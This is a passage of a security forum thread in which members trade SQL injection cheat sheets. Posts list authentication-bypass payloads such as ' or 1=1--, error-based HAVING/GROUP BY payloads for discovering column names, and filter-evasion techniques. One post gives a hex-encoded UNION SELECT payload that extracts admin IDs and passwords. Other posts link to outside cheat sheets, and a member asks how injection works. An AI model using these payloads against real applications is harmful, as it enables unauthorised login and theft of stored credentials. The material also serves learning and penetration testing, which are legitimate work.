Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: SQL Injection Cheat Sheets Share/Save - My123World.Com!

  1. #1
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2

    SQL Injection Cheat Sheets

    Though there are lot of websites which provide cheat sheets I thought we should maintain and update our own Cheat Sheets.please update you favorite or newly learned SQL Injection Cheat sheets here.

  2. #2
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2

    Basic Login Tricks

    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--

  3. #3
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    Finding Column Names with HAVING BY - Error Based

    ' HAVING 1=1 --
    ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --

    and so on

  4. #4
    Nice initiative bro..Here's the best cheat sheet on sql injections by Ferruh mavituna

    http://ferruh.mavituna.com/sql-injec...heatsheet-oku/
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

  5. #5
    Super Commando Dhruv abhaythehero's Avatar
    Join Date
    Sep 2010
    Location
    Lucknow/Pune,India
    Posts
    466
    Blog Entries
    2
    Informix SQL Injection Cheat Sheet
    MSSQL Injection Cheat Sheet
    Oracle SQL Injection Cheat Sheet
    MySQL SQL Injection Cheat Sheet
    Postgres SQL Injection Cheat Sheet
    DB2 SQL Injection Cheat Sheet
    Ingres SQL Injection Cheat Sheet

    http://pentestmonkey.net/index.php?o...id=24&Itemid=1
    In the world of 0s and 1s, are you a zero or The One !

  6. #6

  7. #7
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744

    Reiners' Weblog and SQL IT tool

    Reiners' Weblog : His blog is a good resource for various SQL injection techniques including filter evasion.

    ________________________________________

    SQL Inject Toy (SQL IT)

    In order to avoid SQL Injection there could be some "string" filtering.
    e.g. UNION, SELECT, ORDER BY can be put in a blacklist.
    Sometimes uNiOn, SeLecT etc. may work if "case sensitivity" has not been considered.

    But to make things worse none of the following works sometime:
    uNion
    'uN'/**/'i'/**/'on'
    unhex(hex(union))
    0x(hex value of union)
    etc.

    Example:
    Using the SQL IT tool, it converts the string UNION ALL SELECT 1, concat(admin_id,admin_pass), 3, 4, 5, 6 FROM admin--
    to
    %55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%2 0%31%2c%20%63%6f%6e%63%61%74%28%61%64%6d%69%6e%5f% 69%64%2c%61%64%6d%69%6e%5f%70%61%73%73%29%2c%20%33 %2c%20%34%2c%20%35%2c%20%36%20%46%52%4f%4d%20%61%6 4%6d%69%6e%2d%2d%20
    and helps bypass the filtering.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  8. #8
    SQL Injection Cheat Sheet w/ filter evasion

    http://ha.ckers.org/sqlinjection


    Other SQL Injection Cheat Sheets:

    Oracle SQL Injection via Web
    Last edited by ajaysinghnegi; 03-18-2012 at 12:04 AM.

  9. #9
    I am still confuse with a que.How meta-characters work with sql injection? How sql injection works?How a single qoute works,what it will do when we put in url or a field,how we receive an error msg?

  10. #10
    Web Security Consultant amolnaik4's Avatar
    Join Date
    Jul 2011
    Location
    webr00t
    Posts
    277
    Blog Entries
    4
    Quote Originally Posted by Deepak Rathore View Post
    I am still confuse with a que.How meta-characters work with sql injection? How sql injection works?How a single qoute works,what it will do when we put in url or a field,how we receive an error msg?
    Hey Deepak,
    YOu should checkout "Garage4Hackers Ranchoddas Series of Webcasts-SQL Injection: Novice to Ninja" which will I guess clear your doubts.
    http://www.garage4hackers.com/f2/gar...inja-2114.html

    AMol NAik

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •